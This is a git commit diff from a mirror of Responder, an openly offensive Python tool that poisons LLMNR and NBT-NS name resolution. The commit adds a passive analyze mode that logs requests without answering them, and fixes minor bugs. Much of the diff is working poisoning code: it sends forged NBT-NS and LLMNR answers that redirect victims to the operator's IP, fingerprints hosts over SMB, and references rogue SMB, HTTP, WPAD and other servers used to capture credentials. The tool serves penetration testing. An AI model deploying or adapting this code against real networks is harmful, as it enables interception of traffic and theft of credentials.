github/Responder
1
0
Fork 0
mirror of https://github.com/lgandx/Responder.git synced 2025-07-30 03:28:45 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Added: Analyze stealth mode. See all traffic, but dont answer (-A cli). Minor bugs also fixed.

Browse source
This commit is contained in:
lgandx 2014-01-29 19:14:25 -05:00
parent bf2fdf083c
commit 9bb2f81044
2 changed files with 173 additions and 68 deletions
Download patch file Download diff file Expand all files Collapse all files

17
Fingerprint.py
View file

@ -15,7 +15,7 @@
# #
# You should have received a copy of the GNU General Public License # You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>. # along with this program. If not, see <http://www.gnu.org/licenses/>.
import re,sys,socket,struct import re,sys,socket,struct,string
from socket import * from socket import *
from odict import OrderedDict from odict import OrderedDict
@ -101,13 +101,14 @@ class SMBSessionFingerData(Packet):
def OsNameClientVersion(data): def OsNameClientVersion(data):
lenght = struct.unpack('<H',data[43:45])[0] try:
pack = tuple(data[47+lenght:].split('\x00\x00\x00'))[:2] lenght = struct.unpack('<H',data[43:45])[0]
var = [e.replace('\x00','') for e in data[47+lenght:].split('\x00\x00\x00')[:2]] pack = tuple(data[47+lenght:].split('\x00\x00\x00'))[:2]
OsVersion, ClientVersion = tuple(var) var = [e.replace('\x00','') for e in data[47+lenght:].split('\x00\x00\x00')[:2]]
print "[+] Os version is:",OsVersion OsVersion, ClientVersion = tuple(var)
print "[+] ClientVersion is:", ClientVersion return OsVersion, ClientVersion
return OsVersion, ClientVersion except:
return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
def RunSmbFinger(host): def RunSmbFinger(host):
s = socket(AF_INET, SOCK_STREAM) s = socket(AF_INET, SOCK_STREAM)

224
Responder.py
View file

@ -16,7 +16,7 @@
# You should have received a copy of the GNU General Public License # You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>. # along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys,struct,SocketServer,re,optparse,socket,thread,Fingerprint,random,os,ConfigParser,BaseHTTPServer, select,urlparse,zlib import sys,struct,SocketServer,re,optparse,socket,thread,Fingerprint,random,os,ConfigParser,BaseHTTPServer, select,urlparse,zlib, string
from SocketServer import TCPServer, UDPServer, ThreadingMixIn, StreamRequestHandler, BaseRequestHandler,BaseServer from SocketServer import TCPServer, UDPServer, ThreadingMixIn, StreamRequestHandler, BaseRequestHandler,BaseServer
from Fingerprint import RunSmbFinger,OsNameClientVersion from Fingerprint import RunSmbFinger,OsNameClientVersion
from odict import OrderedDict from odict import OrderedDict
@ -26,6 +26,8 @@ from random import randrange
parser = optparse.OptionParser(usage='python %prog -i 10.20.30.40 -b On -r On', parser = optparse.OptionParser(usage='python %prog -i 10.20.30.40 -b On -r On',
prog=sys.argv[0], prog=sys.argv[0],
) )
parser.add_option('-A','--analyze', action="store_true", help="Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning anything.", metavar="10.20.30.40",dest="Analyse")
parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="OURIP") parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="OURIP")
parser.add_option('-I','--interface', action="store", help="Network interface to use", metavar="eth0", dest="INTERFACE", default="Not set") parser.add_option('-I','--interface', action="store", help="Network interface to use", metavar="eth0", dest="INTERFACE", default="Not set")
@ -46,7 +48,7 @@ parser.add_option('-v',action="store_true", help="More verbose",dest="Verbose")
options, args = parser.parse_args() options, args = parser.parse_args()
if options.OURIP is None: if options.OURIP is None and options.Analyse is None:
print "-i mandatory option is missing\n" print "-i mandatory option is missing\n"
parser.print_help() parser.print_help()
exit(-1) exit(-1)
@ -86,6 +88,7 @@ Finger_On_Off = options.Finger.upper()
INTERFACE = options.INTERFACE INTERFACE = options.INTERFACE
Verbose = options.Verbose Verbose = options.Verbose
Force_WPAD_Auth = options.Force_WPAD_Auth.upper() Force_WPAD_Auth = options.Force_WPAD_Auth.upper()
AnalyzeMode = options.Analyse
if INTERFACE != "Not set": if INTERFACE != "Not set":
BIND_TO_Interface = INTERFACE BIND_TO_Interface = INTERFACE
@ -114,6 +117,12 @@ def OsInterfaceIsSupported(INTERFACE):
if INTERFACE == "Not set": if INTERFACE == "Not set":
return False return False
def Analyze(AnalyzeMode):
if AnalyzeMode == True:
return True
else:
return False
#Logger #Logger
import logging import logging
logging.basicConfig(filename=str(os.path.join(ResponderPATH,SessionLog)),level=logging.INFO,format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p') logging.basicConfig(filename=str(os.path.join(ResponderPATH,SessionLog)),level=logging.INFO,format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
@ -123,6 +132,10 @@ Log2Filename = str(os.path.join(ResponderPATH,"LLMNR-NBT-NS.log"))
logger2 = logging.getLogger('LLMNR/NBT-NS') logger2 = logging.getLogger('LLMNR/NBT-NS')
logger2.addHandler(logging.FileHandler(Log2Filename,'w')) logger2.addHandler(logging.FileHandler(Log2Filename,'w'))
AnalyzeFilename = str(os.path.join(ResponderPATH,"Analyze-LLMNR-NBT-NS.log"))
logger3 = logging.getLogger('Analyze LLMNR/NBT-NS')
logger3.addHandler(logging.FileHandler(AnalyzeFilename,'w'))
def Show_Help(ExtraHelpData): def Show_Help(ExtraHelpData):
help = "NBT Name Service/LLMNR Responder 2.0.\nPlease send bugs/comments to: lgaffie@trustwave.com\nTo kill this script hit CRTL-C\n\n" help = "NBT Name Service/LLMNR Responder 2.0.\nPlease send bugs/comments to: lgaffie@trustwave.com\nTo kill this script hit CRTL-C\n\n"
help+= ExtraHelpData help+= ExtraHelpData
@ -140,7 +153,7 @@ def WriteData(outfile,data, user):
if re.search(user.encode('hex'), filestr.read().encode('hex')): if re.search(user.encode('hex'), filestr.read().encode('hex')):
filestr.close() filestr.close()
return False return False
if re.search("\$", user): if re.search(re.escape("$"), user):
filestr.close() filestr.close()
return False return False
else: else:
@ -157,7 +170,7 @@ def PrintData(outfile,user):
if re.search(user.encode('hex'), filestr.read().encode('hex')): if re.search(user.encode('hex'), filestr.read().encode('hex')):
filestr.close() filestr.close()
return False return False
if re.search("\$", user): if re.search(re.escape("$"), user):
filestr.close() filestr.close()
return False return False
else: else:
@ -170,7 +183,7 @@ def PrintLLMNRNBTNS(outfile,Message):
return True return True
if os.path.isfile(outfile) == True: if os.path.isfile(outfile) == True:
with open(outfile,"r") as filestr: with open(outfile,"r") as filestr:
if re.search(Message, filestr.read()): if re.search(re.escape(Message), filestr.read()):
filestr.close() filestr.close()
return False return False
else: else:
@ -186,10 +199,8 @@ for i in range(0,len(NumChal),2):
Show_Help("[+]NBT-NS & LLMNR responder started\n[+]Loading Responder.conf File..\nGlobal Parameters set:\nResponder is bound to this interface:%s\nChallenge set is:%s\nWPAD Proxy Server is:%s\nWPAD script loaded:%s\nHTTP Server is:%s\nHTTPS Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nIMAP Server is:%s\nPOP3 Server is:%s\nSMTP Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\nServing Executable via HTTP&WPAD is:%s\nAlways Serving a Specific File via HTTP&WPAD is:%s\n\n"%(BIND_TO_Interface, NumChal,WPAD_On_Off,WPAD_Script,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,IMAP_On_Off,POP_On_Off,SMTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off,Exe_On_Off,Exec_Mode_On_Off)) Show_Help("[+]NBT-NS & LLMNR responder started\n[+]Loading Responder.conf File..\nGlobal Parameters set:\nResponder is bound to this interface:%s\nChallenge set is:%s\nWPAD Proxy Server is:%s\nWPAD script loaded:%s\nHTTP Server is:%s\nHTTPS Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nIMAP Server is:%s\nPOP3 Server is:%s\nSMTP Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\nServing Executable via HTTP&WPAD is:%s\nAlways Serving a Specific File via HTTP&WPAD is:%s\n\n"%(BIND_TO_Interface, NumChal,WPAD_On_Off,WPAD_Script,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,IMAP_On_Off,POP_On_Off,SMTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off,Exe_On_Off,Exec_Mode_On_Off))
#Simple NBNS Services. if AnalyzeMode:
W_REDIRECT = "\x41\x41\x00" print '[+]Responder is in analyze mode. No NBT-NS/LLMNR requests will be poisoned.\n'
FILE_SERVER = "\x43\x41\x00"
#Packet class handling all packet generation (see odict.py). #Packet class handling all packet generation (see odict.py).
class Packet(): class Packet():
@ -252,12 +263,31 @@ class NBT_Ans(Packet):
self.fields["NbtName"] = data[12:46] self.fields["NbtName"] = data[12:46]
self.fields["IP"] = inet_aton(OURIP) self.fields["IP"] = inet_aton(OURIP)
def NBT_NS_Role(data):
Role = {
"\x41\x41\x00":"Workstation/Redirector Service",
"\x42\x4c\x00":"Domain Master Browser. This name is likely a domain controller if any, according to MSFT specs.)",
"\x42\x4d\x00":"Domain controller service. This name is a domain controller.",
"\x42\x4e\x00":"Local Master Browser",
"\x42\x4f\x00":"Browser Election Service.",
"\x43\x41\x00":"File Server Service",
"\x41\x42\x00":"Browser Service",
}
if data in Role:
return Role[data]
else:
return "Service not known."
# Define what are we answering to. # Define what are we answering to.
def Validate_NBT_NS(data,Wredirect): def Validate_NBT_NS(data,Wredirect):
if FILE_SERVER == data[43:46]: if Analyze(AnalyzeMode):
#print NBT_NS_Role(data[43:46])
return False
if NBT_NS_Role(data[43:46]) == "File Server Service":
return True return True
if Wredirect == "ON": if Wredirect == "ON":
if W_REDIRECT == data[43:46]: if NBT_NS_Role(data[43:46]) == "Workstation/Redirector Service":
return True return True
else: else:
return False return False
@ -271,7 +301,7 @@ def Decode_Name(nbname):
for i in range(0, 32, 2): for i in range(0, 32, 2):
l.append(chr(((ord(nbname[i]) - 0x41) << 4) | l.append(chr(((ord(nbname[i]) - 0x41) << 4) |
((ord(nbname[i+1]) - 0x41) & 0xf))) ((ord(nbname[i+1]) - 0x41) & 0xf)))
return ''.join(l).split('\x00', 1)[0].strip() return filter(lambda x: x in string.printable, ''.join(l).split('\x00', 1)[0].replace(' ', ''))
except: except:
return "Illegal NetBIOS name" return "Illegal NetBIOS name"
@ -282,7 +312,26 @@ class NB(BaseRequestHandler):
request, socket = self.request request, socket = self.request
data = request data = request
Name = Decode_Name(data[13:45]) Name = Decode_Name(data[13:45])
if RespondToSpecificHost(RespondTo):
if Analyze(AnalyzeMode):
if data[2:4] == "\x01\x10":
if Is_Finger_On(Finger_On_Off):
try:
Finger = RunSmbFinger((self.client_address[0],445))
Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s.\nOs Version is: %s Client Version is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]),Finger[0],Finger[1])
logger3.warning(Message)
except Exception:
Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s\n"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]))
logger3.warning(Message)
if PrintLLMNRNBTNS(AnalyzeFilename,Message):
print Message
else:
Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]))
if PrintLLMNRNBTNS(AnalyzeFilename,Message):
print Message
logger3.warning(Message)
if RespondToSpecificHost(RespondTo) and Analyze(AnalyzeMode) == False:
if RespondToIPScope(RespondTo, self.client_address[0]): if RespondToIPScope(RespondTo, self.client_address[0]):
if data[2:4] == "\x01\x10": if data[2:4] == "\x01\x10":
if Validate_NBT_NS(data,Wredirect): if Validate_NBT_NS(data,Wredirect):
@ -290,7 +339,7 @@ class NB(BaseRequestHandler):
buff.calculate(data) buff.calculate(data)
for x in range(1): for x in range(1):
socket.sendto(str(buff), self.client_address) socket.sendto(str(buff), self.client_address)
Message = 'NBT-NS Answer sent to: %s. The requested name was : %s.'%(self.client_address[0], Name) Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name)
logging.warning(Message) logging.warning(Message)
if PrintLLMNRNBTNS(Log2Filename,Message): if PrintLLMNRNBTNS(Log2Filename,Message):
print Message print Message
@ -298,6 +347,8 @@ class NB(BaseRequestHandler):
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
print '[+] OsVersion is:%s'%(Finger[0])
print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('[+] OsVersion is:%s'%(Finger[0])) logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('[+] ClientVersion is :%s'%(Finger[1])) logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception: except Exception:
@ -308,12 +359,12 @@ class NB(BaseRequestHandler):
else: else:
if data[2:4] == "\x01\x10": if data[2:4] == "\x01\x10":
if Validate_NBT_NS(data,Wredirect): if Validate_NBT_NS(data,Wredirect) and Analyze(AnalyzeMode) == False:
buff = NBT_Ans() buff = NBT_Ans()
buff.calculate(data) buff.calculate(data)
for x in range(1): for x in range(1):
socket.sendto(str(buff), self.client_address) socket.sendto(str(buff), self.client_address)
Message = 'NBT-NS Answer sent to: %s. The requested name was : %s.'%(self.client_address[0], Name) Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name)
logging.warning(Message) logging.warning(Message)
if PrintLLMNRNBTNS(Log2Filename,Message): if PrintLLMNRNBTNS(Log2Filename,Message):
print Message print Message
@ -321,6 +372,8 @@ class NB(BaseRequestHandler):
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
print '[+] OsVersion is:%s'%(Finger[0])
print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('[+] OsVersion is:%s'%(Finger[0])) logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('[+] ClientVersion is :%s'%(Finger[1])) logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception: except Exception:
@ -330,34 +383,55 @@ class NB(BaseRequestHandler):
################################################################################## ##################################################################################
#Browser Listener #Browser Listener
################################################################################## ##################################################################################
def FindPDC(data,Client): def BecomeBackup(data,Client):
DataOffset = struct.unpack('<H',data[139:141])[0] DataOffset = struct.unpack('<H',data[139:141])[0]
BrowserPacket = data[82+DataOffset:] BrowserPacket = data[82+DataOffset:]
if BrowserPacket[0] == "\x0c": if BrowserPacket[0] == "\x0b":
Domain = ''.join(tuple(BrowserPacket[6:].split('\x00'))[:1]) ServerName = BrowserPacket[1:]
if Domain == "WORKGROUP": if Is_Finger_On(Finger_On_Off):
print "[Browser]Received announcement for Workgroup.. ignoring" try:
elif Domain == "MSHOME": Finger = RunSmbFinger((self.client_address[0],445))
print "[Browser]Received announcement for MSHOME.. ignoring" Message = "[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s wants to become a backup browser (Local Master Browser backup) on this domain: %s.\nOs Version is: %s Client Version is: %s"%(Client, Decode_Name(data[15:47]),NBT_NS_Role(data[45:48]),Decode_Name(data[49:81]),Finger[0],Finger[1])
logger3.warning(Message)
except Exception:
Message = "[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s wants to become a backup browser (Local Master Browser backup) on this domain: %s."%(Client, Decode_Name(data[15:47]),NBT_NS_Role(data[45:48]),Decode_Name(data[49:81]))
logger3.warning(Message)
else: else:
print "[Browser]PDC ip address is: ",Client Message = "[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s wants to become a backup browser (Local Master Browser backup) on this domain: %s."%(Client, Decode_Name(data[15:47]),NBT_NS_Role(data[45:48]),Decode_Name(data[49:81]))
logging.warning('[Browser] PDC ip address is: %s'%(Client)) if PrintLLMNRNBTNS(AnalyzeFilename,Message):
print "[Browser]PDC Domain Name is: ", Domain print Message
logging.warning('[Browser]PDC Domain Name is: %s'%(Domain)) logger3.warning(Message)
ServerName = BrowserPacket[6+16+10:]
print "[Browser]PDC Machine Name is: ", ServerName.replace("\x00","")
logging.warning('[Browser]PDC Machine Name is: %s'%(ServerName.replace("\x00","")))
else: else:
pass pass
def ParseDatagramNBTNames(data,Client):
if Is_Finger_On(Finger_On_Off):
try:
Finger = RunSmbFinger((Client,445))
Message = '[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s\nOs Version is: %s Client Version is: %s'%(Client, Decode_Name(data[15:47]),NBT_NS_Role(data[45:48]),Decode_Name(data[49:81]), NBT_NS_Role(data[79:82]),Finger[0],Finger[1])
logger3.warning(Message)
except Exception:
Message = '[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s'%(Client, Decode_Name(data[15:47]),NBT_NS_Role(data[45:48]),Decode_Name(data[49:81]), NBT_NS_Role(data[79:82]))
logger3.warning(Message)
if PrintLLMNRNBTNS(AnalyzeFilename,Message):
print Message
else:
Message = '[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s'%(Client, Decode_Name(data[15:47]),NBT_NS_Role(data[45:48]),Decode_Name(data[49:81]), NBT_NS_Role(data[79:82]))
logger3.warning(Message)
if PrintLLMNRNBTNS(AnalyzeFilename,Message):
print Message
class Browser(BaseRequestHandler): class Browser(BaseRequestHandler):
def handle(self): def handle(self):
try: try:
request, socket = self.request request, socket = self.request
FindPDC(request,self.client_address[0]) if Analyze(AnalyzeMode):
ParseDatagramNBTNames(request,self.client_address[0])
BecomeBackup(request,self.client_address[0])
BecomeBackup(request,self.client_address[0])
except Exception: except Exception:
pass raise
################################################################################## ##################################################################################
#SMB Server #SMB Server
################################################################################## ##################################################################################
@ -821,11 +895,14 @@ def Parse_LLMNR_Name(data,addr):
return Name return Name
def Parse_IPV6_Addr(data): def Parse_IPV6_Addr(data):
Len = len(data) if data[len(data)-4:len(data)][1] =="\x1c":
if data[Len-4:Len][1] =="\x1c":
return False return False
else: if data[len(data)-4:len(data)] == "\x00\x01\x00\x01":
return True return True
if data[len(data)-4:len(data)] == "\x00\xff\x00\x01":
return True
else:
return False
def FindLocalIP(Iface): def FindLocalIP(Iface):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
@ -838,12 +915,12 @@ def RunLLMNR():
ALL = '0.0.0.0' ALL = '0.0.0.0'
MADDR = "224.0.0.252" MADDR = "224.0.0.252"
MPORT = 5355 MPORT = 5355
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
if IsOsX(): if IsOsX():
print "OsX Bind to interface is not supported..Listening on all interfaces." print "OsX Bind to interface is not supported..Listening on all interfaces."
if OsInterfaceIsSupported(INTERFACE): if OsInterfaceIsSupported(INTERFACE):
try: try:
IP = FindLocalIP(BIND_TO_Interface) IP = FindLocalIP(BIND_TO_Interface)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.setsockopt(socket.SOL_SOCKET, 25, BIND_TO_Interface+'\0') s.setsockopt(socket.SOL_SOCKET, 25, BIND_TO_Interface+'\0')
s.bind((ALL,MPORT)) s.bind((ALL,MPORT))
s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1) s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
@ -854,6 +931,7 @@ def RunLLMNR():
sys.exit(1) sys.exit(1)
else: else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1) s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
s.bind((ALL,MPORT)) s.bind((ALL,MPORT))
s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255) s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
@ -863,48 +941,74 @@ def RunLLMNR():
while True: while True:
try: try:
data, addr = s.recvfrom(1024) data, addr = s.recvfrom(1024)
if Analyze(AnalyzeMode):
if data[2:4] == "\x00\x00":
if Parse_IPV6_Addr(data):
Name = Parse_LLMNR_Name(data,addr)
if Is_Finger_On(Finger_On_Off):
try:
Finger = RunSmbFinger((addr[0],445))
Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s.\nOs Version is: %s Client Version is: %s"%(addr[0], Name,Finger[0],Finger[1])
logger3.warning(Message)
except Exception:
Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s."%(addr[0], Name)
logger3.warning(Message)
if PrintLLMNRNBTNS(AnalyzeFilename,Message):
print Message
else:
Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s."%(addr[0], Name)
if PrintLLMNRNBTNS(AnalyzeFilename,Message):
print Message
logger3.warning(Message)
if RespondToSpecificHost(RespondTo): if RespondToSpecificHost(RespondTo):
if RespondToIPScope(RespondTo, addr[0]): if Analyze(AnalyzeMode) == False:
if data[2:4] == "\x00\x00": if RespondToIPScope(RespondTo, addr[0]):
if data[2:4] == "\x00\x00":
if Parse_IPV6_Addr(data):
Name = Parse_LLMNR_Name(data,addr)
buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
buff.calculate()
for x in range(1):
s.sendto(str(buff), addr)
Message = "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(addr[0],Name)
logging.warning(Message)
if PrintLLMNRNBTNS(Log2Filename,Message):
print Message
logger2.warning(Message)
if Is_Finger_On(Finger_On_Off):
try:
Finger = RunSmbFinger((addr[0],445))
print '[+] OsVersion is:%s'%(Finger[0])
print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception:
logging.warning('[+] Fingerprint failed for host: %s'%(addr[0]))
pass
else:
if data[2:4] == "\x00\x00":
if Analyze(AnalyzeMode) == False:
if Parse_IPV6_Addr(data): if Parse_IPV6_Addr(data):
Name = Parse_LLMNR_Name(data,addr) Name = Parse_LLMNR_Name(data,addr)
buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name) buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
buff.calculate() buff.calculate()
Message = "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(addr[0],Name)
for x in range(1): for x in range(1):
s.sendto(str(buff), addr) s.sendto(str(buff), addr)
Message = "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(addr[0],Name)
logging.warning(Message)
if PrintLLMNRNBTNS(Log2Filename,Message): if PrintLLMNRNBTNS(Log2Filename,Message):
print Message print Message
logger2.warning(Message) logger2.warning(Message)
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((addr[0],445)) Finger = RunSmbFinger((addr[0],445))
print '[+] OsVersion is:%s'%(Finger[0])
print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('[+] OsVersion is:%s'%(Finger[0])) logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('[+] ClientVersion is :%s'%(Finger[1])) logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception: except Exception:
logging.warning('[+] Fingerprint failed for host: %s'%(addr[0])) logging.warning('[+] Fingerprint failed for host: %s'%(addr[0]))
pass pass
else:
if data[2:4] == "\x00\x00":
if Parse_IPV6_Addr(data):
Name = Parse_LLMNR_Name(data,addr)
buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
buff.calculate()
Message = "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(addr[0],Name)
for x in range(1):
s.sendto(str(buff), addr)
if PrintLLMNRNBTNS(Log2Filename,Message):
print Message
logger2.warning(Message)
if Is_Finger_On(Finger_On_Off):
try:
Finger = RunSmbFinger((addr[0],445))
logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception:
logging.warning('[+] Fingerprint failed for host: %s'%(addr[0]))
pass
except: except:
raise raise